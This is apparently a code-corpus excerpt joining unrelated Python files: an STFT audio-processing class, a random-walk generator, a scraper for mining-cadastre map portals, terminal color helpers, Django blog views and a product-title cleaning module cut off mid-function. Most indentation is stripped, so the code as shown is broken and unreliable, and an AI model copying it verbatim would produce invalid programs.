wall1 = pra.wall_factory(w_info["corners"], [0.2], [0.1])
# the same wall with normal pointing the other way
wall2 = pra.wall_factory(w_info["corners"][:, ::-1], [0.2], [0.1])
err = np.linalg.norm(wall1.normal + wall2.normal)
assert err < eps, "The error is {}".format(err)
if __name__ == "__main__":
wall0 = test_wall_3d_construct_0()
test_wall_3d_normal_0()
test_wall_3d_area_0()
wall1 = test_wall_3d_construct_1()
test_wall_3d_normal_1()
test_wall_3d_area_1()
```
#### File: pyroomacoustics/transform/stft.py
```python
from __future__ import division
import numpy as np
from numpy.lib.stride_tricks import as_strided as _as_strided
from .dft import DFT
class STFT(object):
"""
A class for STFT processing.
Parameters
-----------
N : int
number of samples per frame
hop : int
hop size
analysis_window : numpy array
window applied to block before analysis
synthesis_window : numpy array
window applied to the block before synthesis
channels : int
number of signals
transform : str, optional
which FFT package to use: 'numpy' (default), 'pyfftw', or 'mkl'
streaming : bool, optional
whether (True, default) or not (False) to "stitch" samples between
repeated calls of 'analysis' and 'synthesis' if we are receiving a
continuous stream of samples.
num_frames : int, optional
Number of frames to be processed. If set, this will be strictly enforced
as the STFT block will allocate memory accordingly. If not set, there
will be no check on the number of frames sent to
analysis/process/synthesis
NOTE:
1) num_frames = 0, corresponds to a "real-time" case in which each
input block corresponds to [hop] samples.
2) num_frames > 0, requires [(num_frames-1)*hop + N] samples as the
last frame must contain [N] samples.
precision : string, np.float32, np.float64, np.complex64, np.complex128, optional
How many precision bits to use for the input.
If 'single'/np.float32/np.complex64, 32 bits for real inputs or 64 for complex spectrum.
Otherwise, cast to 64 bits for real inputs or 128 for complex spectrum (default).
"""
def __init__(
self,
N,
hop=None,
analysis_window=None,
synthesis_window=None,
channels=1,
transform="numpy",
streaming=True,
precision="double",
**kwargs
):
# initialize parameters
self.num_samples = N # number of samples per frame
self.num_channels = channels # number of channels
self.mono = True if self.num_channels == 1 else False
if hop is not None: # hop size --> number of input samples
self.hop = hop
else:
self.hop = self.num_samples
if (
precision == np.float32
or precision == np.complex64
or precision == "single"
):
self.time_dtype = np.float32
self.freq_dtype = np.complex64
else:
self.time_dtype = np.float64
self.freq_dtype = np.complex128
# analysis and synthesis window
self.analysis_window = analysis_window
self.synthesis_window = synthesis_window
# prepare variables for DFT object
self.transform = transform
self.nfft = self.num_samples # differ when there is zero-padding
self.nbin = self.nfft // 2 + 1
# initialize filter + zero padding --> use set_filter
self.zf = 0
self.zb = 0
self.H = None # filter frequency spectrum
self.H_multi = None # for multiple frames
# check keywords
if "num_frames" in kwargs.keys():
self.fixed_input = True
num_frames = kwargs["num_frames"]
if num_frames < 0:
raise ValueError("num_frames must be non-negative!")
self.num_frames = num_frames
else:
self.fixed_input = False
self.num_frames = 0
# allocate all the required buffers
self.streaming = streaming
self._make_buffers()
def _make_buffers(self):
"""
Allocate memory for internal buffers according to FFT size, number of
channels, and number of frames.
"""
# state variables
self.n_state = self.num_samples - self.hop
self.n_state_out = self.nfft - self.hop
# make DFT object
self.dft = DFT(
nfft=self.nfft,
D=self.num_channels,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
"""
1D array for num_channels=1 as the FFTW package can only take 1D array
for 1D DFT.
"""
if self.mono:
# input buffer
self.fft_in_buffer = np.zeros(self.nfft, dtype=self.time_dtype)
# state buffer
self.x_p = np.zeros(self.n_state, dtype=self.time_dtype)
# prev reconstructed samples
self.y_p = np.zeros(self.n_state_out, dtype=self.time_dtype)
# output samples
self.out = np.zeros(self.hop, dtype=self.time_dtype)
else:
# input buffer
self.fft_in_buffer = np.zeros(
(self.nfft, self.num_channels), dtype=self.time_dtype
)
# state buffer
self.x_p = np.zeros(
(self.n_state, self.num_channels), dtype=self.time_dtype
)
# prev reconstructed samples
self.y_p = np.zeros(
(self.n_state_out, self.num_channels), dtype=self.time_dtype
)
# output samples
self.out = np.zeros((self.hop, self.num_channels), dtype=self.time_dtype)
# useful views on the input buffer
self.fft_in_state = self.fft_in_buffer[
self.zf : self.zf + self.n_state,
]
self.fresh_samples = self.fft_in_buffer[
self.zf + self.n_state : self.zf + self.n_state + self.hop,
]
self.old_samples = self.fft_in_buffer[
self.zf + self.hop : self.zf + self.hop + self.n_state,
]
# if fixed number of frames to process
if self.fixed_input:
if self.num_frames == 0:
if self.mono:
self.X = np.zeros(self.nbin, dtype=self.freq_dtype)
else:
self.X = np.zeros(
(self.nbin, self.num_channels), dtype=self.freq_dtype
)
else:
self.X = np.squeeze(
np.zeros(
(self.num_frames, self.nbin, self.num_channels),
dtype=self.freq_dtype,
)
)
# DFT object for multiple frames
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
else: # we will allocate these on-the-fly
self.X = None
self.dft_frames = None
def reset(self):
"""
Reset state variables. Necessary after changing or setting the filter
or zero padding.
"""
if self.mono:
self.fft_in_buffer[:] = 0.0
self.x_p[:] = 0.0
self.y_p[:] = 0.0
self.X[:] = 0.0
self.out[:] = 0.0
else:
self.fft_in_buffer[:, :] = 0.0
self.x_p[:, :] = 0.0
self.y_p[:, :] = 0.0
self.X[:, :] = 0.0
self.out[:, :] = 0.0
def zero_pad_front(self, zf):
"""
Set zero-padding at beginning of frame.
"""
self.zf = zf
self.nfft = self.num_samples + self.zb + self.zf
self.nbin = self.nfft // 2 + 1
if self.analysis_window is not None:
self.analysis_window = np.concatenate((np.zeros(zf), self.analysis_window))
if self.synthesis_window is not None:
self.synthesis_window = np.concatenate(
(np.zeros(zf), self.synthesis_window)
)
# We need to reallocate buffers after changing zero padding
self._make_buffers()
def zero_pad_back(self, zb):
"""
Set zero-padding at end of frame.
"""
self.zb = zb
self.nfft = self.num_samples + self.zb + self.zf
self.nbin = self.nfft // 2 + 1
if self.analysis_window is not None:
self.analysis_window = np.concatenate((self.analysis_window, np.zeros(zb)))
if self.synthesis_window is not None:
self.synthesis_window = np.concatenate(
(self.synthesis_window, np.zeros(zb))
)
# We need to reallocate buffers after changing zero padding
self._make_buffers()
def set_filter(self, coeff, zb=None, zf=None, freq=False):
"""
Set time-domain FIR filter with appropriate zero-padding.
Frequency spectrum of the filter is computed and set for the object.
There is also a check for sufficient zero-padding.
Parameters
-----------
coeff : numpy array
Filter in time domain.
zb : int
Amount of zero-padding added to back/end of frame.
zf : int
Amount of zero-padding added to front/beginning of frame.
freq : bool
Whether or not given coefficients (coeff) are in the frequency
domain.
"""
# apply zero-padding
if zb is not None:
self.zero_pad_back(zb)
if zf is not None:
self.zero_pad_front(zf)
if not freq:
# compute filter magnitude and phase spectrum
self.H = self.freq_dtype(np.fft.rfft(coeff, self.nfft, axis=0))
# check for sufficient zero-padding
if self.nfft < (self.num_samples + len(coeff) - 1):
raise ValueError(
"Insufficient zero-padding for chosen number "
"of samples per frame (L) and filter length "
"(h). Require zero-padding such that new "
"length is at least (L+h-1)."
)
else:
if len(coeff) != self.nbin:
raise ValueError("Invalid length for frequency domain " "coefficients.")
self.H = coeff
# prepare filter if fixed input case
if self.fixed_input:
if self.num_channels == 1:
self.H_multi = np.tile(self.H, (self.num_frames, 1))
else:
self.H_multi = np.tile(self.H, (self.num_frames, 1, 1))
def analysis(self, x):
"""
Parameters
-----------
x : 2D numpy array, [samples, channels]
Time-domain signal.
"""
# ----check correct number of channels
x_shape = x.shape
if not self.mono:
if len(x_shape) < 1: # received mono
raise ValueError(
"Received 1-channel signal. Expecting %d "
"channels." % self.num_channels
)
if x_shape[1] != self.num_channels:
raise ValueError(
"Incorrect number of channels. Received %d, "
"expecting %d." % (x_shape[1], self.num_channels)
)
else: # expecting mono
if len(x_shape) > 1: # received multi-channel
raise ValueError(
"Received %d channels; expecting 1D mono " "signal." % x_shape[1]
)
# ----check number of frames
if self.streaming: # need integer multiple of hops
if self.fixed_input:
if x_shape[0] != self.num_frames * self.hop:
raise ValueError(
"Input must be of length %d; received %d "
"samples." % (self.num_frames * self.hop, x_shape[0])
)
else:
self.num_frames = int(np.ceil(x_shape[0] / self.hop))
extra_samples = (self.num_frames * self.hop) - x_shape[0]
if extra_samples:
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
# non-streaming
# need at least num_samples for last frame
# e.g.[hop|hop|...|hop|num_samples]
else:
if self.fixed_input:
if x_shape[0] != (self.hop * (self.num_frames - 1) + self.num_samples):
raise ValueError(
"Input must be of length %d; received %d "
"samples."
% (
(self.hop * (self.num_frames - 1) + self.num_samples),
x_shape[0],
)
)
else:
if x_shape[0] < self.num_samples:
# raise ValueError('Not enough samples. Received %d; need \
# at least %d.' % (x_shape[0],self.num_samples))
extra_samples = self.num_samples - x_shape[0]
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
self.num_frames = 1
else:
# calculate num_frames and append zeros if necessary
self.num_frames = int(
np.ceil((x_shape[0] - self.num_samples) / self.hop) + 1
)
extra_samples = (
(self.num_frames - 1) * self.hop + self.num_samples
) - x_shape[0]
if extra_samples:
if self.mono:
x = np.concatenate((x, np.zeros(extra_samples)))
else:
x = np.concatenate(
(x, np.zeros((extra_samples, self.num_channels)))
)
# ----allocate memory if necessary
if not self.fixed_input:
self.X = np.squeeze(
np.zeros(
(self.num_frames, self.nbin, self.num_channels),
dtype=self.freq_dtype,
)
)
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
# ----use appropriate function
if self.streaming:
self._analysis_streaming(x)
else:
self.reset()
self._analysis_non_streaming(x)
return self.X
def _analysis_single(self, x_n):
"""
Transform new samples to STFT domain for analysis.
Parameters
-----------
x_n : numpy array
[self.hop] new samples
"""
# correct input size check in: dft.analysis()
        self.fresh_samples[:,] = x_n[:,]  # introduce new samples
self.x_p[:,] = self.old_samples # save next state
# apply DFT to current frame
self.X[:] = self.dft.analysis(self.fft_in_buffer)
# shift backwards in the buffer the state
        self.fft_in_state[:,] = self.x_p[:,]
def _analysis_streaming(self, x):
"""
STFT analysis for streaming case in which we expect
[num_frames*hop] samples
"""
if self.num_frames == 1:
self._analysis_single(x)
else:
n = 0
for k in range(self.num_frames):
# introduce new samples
                self.fresh_samples[:,] = x[n : n + self.hop,]
# save next state
self.x_p[:,] = self.old_samples
# apply DFT to current frame
self.X[k,] = self.dft.analysis(self.fft_in_buffer)
# shift backwards in the buffer the state
                self.fft_in_state[:,] = self.x_p[:,]
n += self.hop
def _analysis_non_streaming(self, x):
"""
STFT analysis for non-streaming case in which we expect
[(num_frames-1)*hop+num_samples] samples
"""
## ----- STRIDED WAY
new_strides = (x.strides[0], self.hop * x.strides[0])
new_shape = (self.num_samples, self.num_frames)
if not self.mono:
for c in range(self.num_channels):
y = _as_strided(x[:, c], shape=new_shape, strides=new_strides)
y = np.concatenate(
(
np.zeros((self.zf, self.num_frames)),
y,
np.zeros((self.zb, self.num_frames)),
)
)
if self.num_frames == 1:
self.X[:, c] = self.dft_frames.analysis(y[:, 0]).T
else:
self.X[:, :, c] = self.dft_frames.analysis(y).T
else:
y = _as_strided(x, shape=new_shape, strides=new_strides)
y = np.concatenate(
(
np.zeros((self.zf, self.num_frames)),
y,
np.zeros((self.zb, self.num_frames)),
)
)
if self.num_frames == 1:
self.X[:] = self.dft_frames.analysis(y[:, 0]).T
else:
self.X[:] = self.dft_frames.analysis(y).T
def _check_input_frequency_dimensions(self, X):
"""
Ensure that given frequency data is valid, i.e. number of channels and
number of frequency bins.
If fixed_input=True, ensure expected number of frames. Otherwise, infer
from given data.
Axis order of X should be : [frames, frequencies, channels]
"""
# check number of frames and correct number of bins
X_shape = X.shape
if len(X_shape) == 1: # single channel, one frame
num_frames = 1
elif len(X_shape) == 2 and not self.mono: # multi-channel, one frame
num_frames = 1
elif len(X_shape) == 2 and self.mono: # single channel, multiple frames
num_frames = X_shape[0]
elif len(X_shape) == 3 and not self.mono: # multi-channel, multiple frames
num_frames = X_shape[0]
else:
raise ValueError("Invalid input shape.")
# check number of bins
if num_frames == 1:
if X_shape[0] != self.nbin:
raise ValueError(
"Invalid number of frequency bins! Expecting "
"%d, got %d." % (self.nbin, X_shape[0])
)
else:
if X_shape[1] != self.nbin:
raise ValueError(
"Invalid number of frequency bins! Expecting"
" %d, got %d." % (self.nbin, X_shape[1])
)
# check number of frames, if fixed input size
if self.fixed_input:
if num_frames != self.num_frames:
raise ValueError("Input must have %d frames!" % self.num_frames)
self.X[:] = X # reset if size is alright
else:
self.X = X
self.num_frames = num_frames
return self.X
def process(self, X=None):
"""
Parameters
-----------
X : numpy array
X can take on multiple shapes:
1) (N,) if it is single channel and only one frame
2) (N,D) if it is multi-channel and only one frame
3) (F,N) if it is single channel but multiple frames
4) (F,N,D) if it is multi-channel and multiple frames
Returns
-----------
x_r : numpy array
Reconstructed time-domain signal.
"""
# check that there is filter
if self.H is None:
return
if X is not None:
self._check_input_frequency_dimensions(X)
# use appropriate function
if self.num_frames == 1:
self._process_single()
elif self.num_frames > 1:
self._process_multiple()
return self.X
def _process_single(self):
np.multiply(self.X, self.H, self.X)
def _process_multiple(self):
if not self.fixed_input:
if self.mono:
self.H_multi = np.tile(self.H, (self.num_frames, 1))
else:
self.H_multi = np.tile(self.H, (self.num_frames, 1, 1))
np.multiply(self.X, self.H_multi, self.X)
def synthesis(self, X=None):
"""
Parameters
-----------
X : numpy array of frequency content
X can take on multiple shapes:
1) (N,) if it is single channel and only one frame
2) (N,D) if it is multi-channel and only one frame
3) (F,N) if it is single channel but multiple frames
4) (F,N,D) if it is multi-channel and multiple frames
where:
- F is the number of frames
- N is the number of frequency bins
- D is the number of channels
Returns
-----------
x_r : numpy array
Reconstructed time-domain signal.
"""
if X is not None:
self._check_input_frequency_dimensions(X)
# use appropriate function
if self.num_frames == 1:
return self._synthesis_single()
elif self.num_frames > 1:
return self._synthesis_multiple()
def _synthesis_single(self):
"""
Transform to time domain and reconstruct output with overlap-and-add.
Returns
-------
numpy array
Reconstructed array of samples of length <self.hop>.
"""
# apply IDFT to current frame
self.dft.synthesis(self.X)
return self._overlap_and_add()
def _synthesis_multiple(self):
"""
Apply STFT analysis to multiple frames.
Returns
-----------
x_r : numpy array
Recovered signal.
"""
# synthesis + overlap and add
if not self.mono:
x_r = np.zeros(
(self.num_frames * self.hop, self.num_channels), dtype=self.time_dtype
)
n = 0
for f in range(self.num_frames):
# apply IDFT to current frame and reconstruct output
x_r[n : n + self.hop,] = self._overlap_and_add(
self.dft.synthesis(self.X[f, :, :])
)
n += self.hop
else:
x_r = np.zeros(self.num_frames * self.hop, dtype=self.time_dtype)
# treat number of frames as the multiple channels for DFT
if not self.fixed_input:
self.dft_frames = DFT(
nfft=self.nfft,
D=self.num_frames,
analysis_window=self.analysis_window,
synthesis_window=self.synthesis_window,
transform=self.transform,
)
# back to time domain
mx = self.dft_frames.synthesis(self.X.T)
# overlap and add
n = 0
for f in range(self.num_frames):
x_r[n : n + self.hop,] = self._overlap_and_add(mx[:, f])
n += self.hop
return x_r
def _overlap_and_add(self, x=None):
if x is None:
x = self.dft.x
        self.out[:,] = x[0 : self.hop,]  # fresh output samples
# add state from previous frames when overlap is used
if self.n_state_out > 0:
m = np.minimum(self.hop, self.n_state_out)
self.out[:m,] += self.y_p[
:m,
]
# update state variables
self.y_p[: -self.hop,] = self.y_p[
self.hop :,
] # shift out left
self.y_p[-self.hop :,] = 0.0
self.y_p[:,] += x[
-self.n_state_out :,
]
return self.out
" ---------------------------------------------------------------------------- "
" --------------- One-shot functions to avoid creating object. --------------- "
" ---------------------------------------------------------------------------- "
# Authors: <NAME>, <NAME>, <NAME>
def analysis(x, L, hop, win=None, zp_back=0, zp_front=0):
"""
Convenience function for one-shot STFT
Parameters
----------
x: array_like, (n_samples) or (n_samples, n_channels)
input signal
L: int
frame size
hop: int
shift size between frames
win: array_like
the window to apply (default None)
zp_back: int
zero padding to apply at the end of the frame
zp_front: int
zero padding to apply at the beginning of the frame
Returns
-------
X: ndarray, (n_frames, n_frequencies) or (n_frames, n_frequencies, n_channels)
The STFT of x
"""
if x.ndim == 2:
channels = x.shape[1]
else:
channels = 1
the_stft = STFT(
L, hop=hop, analysis_window=win, channels=channels, precision=x.dtype
)
if zp_back > 0:
the_stft.zero_pad_back(zp_back)
if zp_front > 0:
the_stft.zero_pad_front(zp_front)
# apply transform
return the_stft.analysis(x)
# inverse STFT
def synthesis(X, L, hop, win=None, zp_back=0, zp_front=0):
"""
Convenience function for one-shot inverse STFT
Parameters
----------
X: array_like (n_frames, n_frequencies) or (n_frames, n_frequencies, n_channels)
The data
L: int
frame size
hop: int
shift size between frames
win: array_like
the window to apply (default None)
zp_back: int
zero padding to apply at the end of the frame
zp_front: int
zero padding to apply at the beginning of the frame
Returns
-------
x: ndarray, (n_samples) or (n_samples, n_channels)
The inverse STFT of X
"""
if X.ndim == 3:
channels = X.shape[2]
else:
channels = 1
the_stft = STFT(
L, hop=hop, synthesis_window=win, channels=channels, precision=X.dtype
)
if zp_back > 0:
the_stft.zero_pad_back(zp_back)
if zp_front > 0:
the_stft.zero_pad_front(zp_front)
# apply transform
return the_stft.synthesis(X)
def compute_synthesis_window(analysis_window, hop):
"""
Computes the optimal synthesis window given an analysis window
and hop (frame shift). The procedure is described in
<NAME> and <NAME>, *Signal estimation from modified short-time Fourier transform,*
IEEE Trans. Acoustics, Speech, and Signal Process.,
vol. 32, no. 2, pp. 236-243, 1984.
Parameters
----------
analysis_window: array_like
The analysis window
hop: int
The frame shift
"""
norm = np.zeros_like(analysis_window)
L = analysis_window.shape[0]
# move the window back as far as possible while still overlapping
n = 0
while n - hop > -L:
n -= hop
# now move the window and sum all the contributions
while n < L:
if n == 0:
norm += analysis_window ** 2
elif n < 0:
norm[: n + L] += analysis_window[-n - L :] ** 2
else:
norm[n:] += analysis_window[:-n] ** 2
n += hop
return analysis_window / norm
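# --- Hedged usage sketch (not part of the original module) ---
# Round-trip a short random signal through the one-shot `analysis` /
# `synthesis` helpers above, deriving the matching synthesis window with
# `compute_synthesis_window`. The block size, hop, and Hann window below are
# illustrative assumptions, not values mandated by the library.
if __name__ == "__main__":
    _block = 512
    _hop = _block // 2
    _analysis_win = np.hanning(_block)
    _synthesis_win = compute_synthesis_window(_analysis_win, _hop)
    _x = np.random.randn(16 * _hop)
    _X = analysis(_x, _block, _hop, win=_analysis_win)
    _x_rec = synthesis(_X, _block, _hop, win=_synthesis_win)
    print(_X.shape, _x_rec.shape)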
``` |
{
"source": "4bic-attic/data_viz",
"score": 4
} |
#### File: 4bic-attic/data_viz/random_walk.py
```python
from random import choice
class RandomWalk():
"""class to generate random walks."""
def __init__(self, num_points=5000):
"""Initialize attributes of a walk"""
self.num_points = num_points
#All walks start from (0, 0)
self.x_values = [0]
self.y_values = [0]
def fill_walk(self):
"""Calculate all the points in the walk"""
#keep taking steps till desired length has been reached
while len(self.x_values) < self.num_points:
#decide which direction to take and how far to go
x_direction = choice([1, -1])
x_distance = choice([0, 1, 2, 3, 4])
x_step = x_direction * x_distance
y_direction = choice([1, -1])
y_distance = choice([0, 1, 2, 3, 4])
y_step = y_direction * y_distance
#reject moves that go nowhere
if x_step == 0 and y_step == 0:
continue
#calculate the next X and Y values
next_x = self.x_values[-1] + x_step
next_y = self.y_values[-1] + y_step
self.x_values.append(next_x)
self.y_values.append(next_y)
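# --- Hedged usage sketch (not part of the original file) ---
# Generate a single walk and scatter-plot it; the matplotlib usage is an
# assumption (the original project plots the points in a separate script).
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    rw = RandomWalk(num_points=1000)
    rw.fill_walk()
    plt.scatter(rw.x_values, rw.y_values, s=2)
    plt.show()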
``` |
{
"source": "4bic/scraper_Mozmbq",
"score": 2
} |
#### File: scraper_Mozmbq/src/flexicadastre_scrape.py
```python
from itertools import count
import requests
import json
import os
import re
from common import DATA_PATH
SITES = {
'NA': 'http://portals.flexicadastre.com/Namibia/',
'MZ': 'http://portals.flexicadastre.com/mozambique/en/',
'KE': 'http://map.miningcadastre.go.ke/map',
'RW': 'http://portals.flexicadastre.com/rwanda/',
'TZ': 'http://portal.mem.go.tz/map/',
'CD': 'http://portals.flexicadastre.com/drc/en/'
}
QUERY = {
'where': '1=1',
'outFields': '*',
'geometryType': 'esriGeometryPolygon',
'spatialRel': 'esriSpatialRelIntersects',
#'units': 'esriSRUnit_Meter',
'outSR': 102100, # wgs 84
'resultRecordCount': 500,
'resultOffset': 0,
'returnGeometry': 'true',
'f': 'pjson'
}
STORE_PATH = os.path.join(DATA_PATH, 'flexicadastre', 'raw')
try:
os.makedirs(STORE_PATH)
except:
pass
def scrape_layers(sess, data, token, rest_url):
res = sess.get(rest_url, params={'f': 'json', 'token': token})
    print('Scraping %s at %s' % (data['source_title'], rest_url))
for layer in res.json().get('layers'):
layer['rest_url'] = rest_url
query_url = '%s/%s/query' % (rest_url, layer['id'])
q = QUERY.copy()
q['token'] = token
layer['query_url'] = query_url
        print(' -> Layer: [%(id)s] %(name)s ' % layer)
for i in count(0):
q['resultOffset'] = q['resultRecordCount'] * i
res = sess.get(query_url, params=q)
page = res.json()
# print page
if 'data' not in layer:
layer['data'] = page
else:
layer['data']['features'].extend(page['features'])
if not page.get('exceededTransferLimit'):
break
data['layers'].append(layer)
# print 'Entries:', len(data['layers'])
return data
def scrape_configs():
for name, url in SITES.items():
sess = requests.Session()
res = sess.get(url)
        groups = re.search(r"MainPage\.Init\('(.*)'", res.text)
text = groups.group(1)
text = text.replace("\\\\\\'", "")
text = text.replace("\\'", "")
text = text.replace('\\\\\\"', "")
text = '"%s"' % text
cfg = json.loads(json.loads(text))
token = cfg['Extras'].pop()
data = {
'source_name': name,
'source_title': cfg['Title'],
'source_url': url,
# 'rest_url': rest_url,
'layers': []
}
for service in cfg['MapServices']:
if service['MapServiceType'] == 'Features':
rest_url = service['RestUrl']
data = scrape_layers(sess, data, token, rest_url)
path = os.path.join(STORE_PATH, '%s.json' % name)
        with open(path, 'w') as fh:
json.dump(data, fh)
if __name__ == '__main__':
scrape_configs()
``` |
{
"source": "4Bos/contils",
"score": 3
} |
#### File: contils/contils/color.py
```python
import typing
from contils.raw import Raw
# reset - \x1b[0m
# black - \x1b[30m
# red - \x1b[31m
# green - \x1b[32m
# yellow - \x1b[33m
# blue - \x1b[34m
# magenta - \x1b[35m
# cyan - \x1b[36m
# light gray - \x1b[37m
# gray - \x1b[90m
# light red - \x1b[91m
# light green - \x1b[92m
# light yellow - \x1b[93m
# light blue - \x1b[94m
# light magenta - \x1b[95m
# light cyan - \x1b[96m
# white - \x1b[97m
class Color(Raw):
_raw: typing.Any
_color: str
def __init__(self, raw: typing.Any, color: str):
self._raw = raw
self._color = color
def __len__(self):
return len(str(self._raw))
def __str__(self):
return f'{self._color}{self._raw}\x1b[0m'
def __raw__(self) -> typing.Any:
return self._raw
def __format__(self, format_spec: str):
result = ('{{0:{0}}}'.format(format_spec)).format(self._raw)
return f'{self._color}{result}\x1b[0m'
pass
def black(raw: typing.Any):
return Color(raw, '\x1b[30m')
def red(raw: typing.Any):
return Color(raw, '\x1b[31m')
def green(raw: typing.Any):
return Color(raw, '\x1b[32m')
def yellow(raw: typing.Any):
return Color(raw, '\x1b[33m')
def blue(raw: typing.Any):
return Color(raw, '\x1b[34m')
def magenta(raw: typing.Any):
return Color(raw, '\x1b[35m')
def cyan(raw: typing.Any):
return Color(raw, '\x1b[36m')
def light_gray(raw: typing.Any):
return Color(raw, '\x1b[37m')
def gray(raw: typing.Any):
return Color(raw, '\x1b[90m')
def light_red(raw: typing.Any):
return Color(raw, '\x1b[91m')
def light_green(raw: typing.Any):
return Color(raw, '\x1b[92m')
def light_yellow(raw: typing.Any):
return Color(raw, '\x1b[93m')
def light_blue(raw: typing.Any):
return Color(raw, '\x1b[94m')
def light_magenta(raw: typing.Any):
return Color(raw, '\x1b[95m')
def light_cyan(raw: typing.Any):
return Color(raw, '\x1b[96m')
def white(raw: typing.Any):
return Color(raw, '\x1b[97m')
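# --- Hedged usage sketch (not part of the original module) ---
# Color objects report len() and honor format specs based on the raw value,
# so padded columns still line up even though the rendered string carries
# ANSI escape codes.
if __name__ == '__main__':
    print(f'{green("PASS"):>8} {red("FAIL"):>8}')
    print(len(green("PASS")))  # 4, the length of the raw text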
```
#### File: contils/contils/flash.py
```python
import typing
from contils.raw import Raw
class Flash:
def __init__(self):
self._max_len = 0
def print(self, msg: typing.Any):
self.clear()
self._max_len = max(self._max_len, len(str(msg.__raw__())) if isinstance(msg, Raw) else len(str(msg)))
print(f'\r{msg}', end='')
def clear(self):
print('\r' + ' ' * self._max_len + '\r', end='')
@staticmethod
def end():
print()
pass
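# --- Hedged usage sketch (not part of the original module) ---
# Overwrite a single terminal line with progress messages, then finish it
# with a newline; the loop below is an illustrative stand-in for real work.
if __name__ == '__main__':
    import time
    flash = Flash()
    for i in range(5):
        flash.print(f'processing item {i}')
        time.sleep(0.2)
    Flash.end()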
```
#### File: contils/contils/raw.py
```python
import abc
import typing
class Raw(abc.ABC):
@abc.abstractmethod
def __raw__(self) -> typing.Any:
pass
pass
``` |
{
"source": "4-bytes/Blogify",
"score": 3
} |
#### File: blogify/posts/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import Post
from . import forms
# Create your views here.
def post_list(request):
posts = Post.objects.all().order_by("-date") # grabs all posts from db ordered by date
    return render(request, "posts/post_list.html", {"posts": posts}) # create dict to send to template with data retrieved from db
def post_detail(request, slug):
post = Post.objects.get(slug=slug)
return render(request, 'posts/post_detail.html', {'post' : post }) # retrieves content for each post
@login_required(login_url="/accounts/login/")
def post_create(request):
if request.method == "POST": # when the submit btn is pressed
form = forms.CreatePost(request.POST, request.FILES)
if form.is_valid():
instance = form.save(commit=False)
instance.author = request.user # set the current logged in user as the post writer
instance.save()
return redirect('posts:list')
else:
form = forms.CreatePost()
return render(request, "posts/post_create.html", { 'form' : form })
@login_required(login_url="/accounts/login")
def post_own(request):
posts = Post.objects.filter(author=request.user) # filter posts by current logged in user
return render(request, "posts/post_own.html", {"posts": posts})
``` |
{
"source": "4c697361/e-commerce",
"score": 3
} |
#### File: src/data/dataframe.py
```python
import os
import sys
import pandas as pd
import numpy as np
from ast import literal_eval
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import string
from collections import Counter
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import src.utils.utils as ut
#nltk.download('all')
def save_df(data, safe_to):
data.to_csv(safe_to, sep=';')
del data
def read_df(load_from):
df = pd.read_csv(load_from, sep=';', header=0)
if('Unnamed: 0' in df.columns):
        df = df.drop(['Unnamed: 0'], axis=1)
for col in ['reduced_title', 'tokenized']:#, 'cat_category', 'cat_product_category', 'cat_product_type', 'cat_product_details']:
if(col in df.columns):
df.loc[:, col] = df.loc[:, col].apply(lambda x: literal_eval(x))
return df
class preparation:
def __init__(self, clean_title):
self.clean_title = clean_title
def __text_cleaning(self, text):
"""
Tokenizing and cleaning proceedure for text data.
"""
deadlist = ['mit', 'xxl', 'xxxl', 'uvp', 'xcm', 'grs', 'grm', 'grl',
'tlg', 'xxcm', 'xcm']
transfer = {
ord('ä'): 'ae',
ord('ö'): 'oe',
ord('ü'): 'ue',
ord('ß'): 'ss'
}
# tokenize the text string
tokens = word_tokenize(text)
# convert to lower case
tokens = [w.lower() for w in tokens]
# transfer German umlauts into vowels
tokens = [w.translate(transfer) for w in tokens]
# remove punctuation and digits from each word
table = str.maketrans('', '', string.punctuation + string.digits)
stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in stripped if word.isalpha()]
# reduce words to their stemms
porter = PorterStemmer()
stemmed = list(set([porter.stem(word) for word in words]))
# filter out
# stop words,
# words that are contained in the deadlist,
# words that are shorter than 3 characters and
# words which are assembled only from one and
# the same identical character
stop_words = set(stopwords.words(['english', 'german']) + deadlist)
words = [w for w in stemmed if w not in stop_words
and len(w) > 2 and len(Counter(w)) > 1]
# et voilà
return words
def make_clean_sku(self, data):
data['imagename'] = data['sku'].astype(str) + '.jpg'
return data
def make_clean_title(self, data):
"""
Tokenize and stemm the title column by creating the new column
'reduced_title'.
For simplicity keep only those references which have a non-vanishing
reduced_title.
"""
if('reduced_title' not in data.columns):
data['reduced_title'] = data['title']\
.apply(lambda x: self.__text_cleaning(x))
data = data[data['reduced_title'].apply(lambda x: len(x) > 0)]
return data.reset_index(drop=True)
def make_clean_imagecontent(self, data):
"""
Keep only references to images in the DataFrame
which exist and are not empty
"""
indices = []
for idx, row in data.iterrows():
src = os.path.join(ut.dirs.original_dataset_dir,
str(row.sku)+'.jpg')
if(os.path.exists(src) is False):
indices.append(idx)
elif(os.path.isfile(src) is False):
indices.append(idx)
else:
if(os.stat(src).st_size == 0):
indices.append(idx)
else:
pass
return data.drop(data.index[indices]).reset_index(drop=True)
def make_expanded_categories(self, data):
"""
Expand the category column to enable multilabel classification
"""
if(('category' in data.columns)):
expanded_cats = data['category'].str.split(' > ')
expanded_cats = expanded_cats.apply(pd.Series)\
.rename({0: 'product_category',
1: 'product_type',
2: 'product_details'},
axis='columns')
return data.join(expanded_cats)
else:
return data
def make_keras_embeddings(self, data):
"""
Create the word embeddings used for training the NLP model
"""
delim = ','
column = 'reduced_title'
if(self.clean_title is not True):
delim = ' '
column = 'title'
if(column in data.columns):
max_len = np.max(np.array([len(x) for x in data.reduced_title]))
vocab_len = data[column].apply(pd.Series).stack().value_counts()
print('************************ max_len:', max_len)
print('************************ vocab_len:', vocab_len, ut.params.n_vocab)
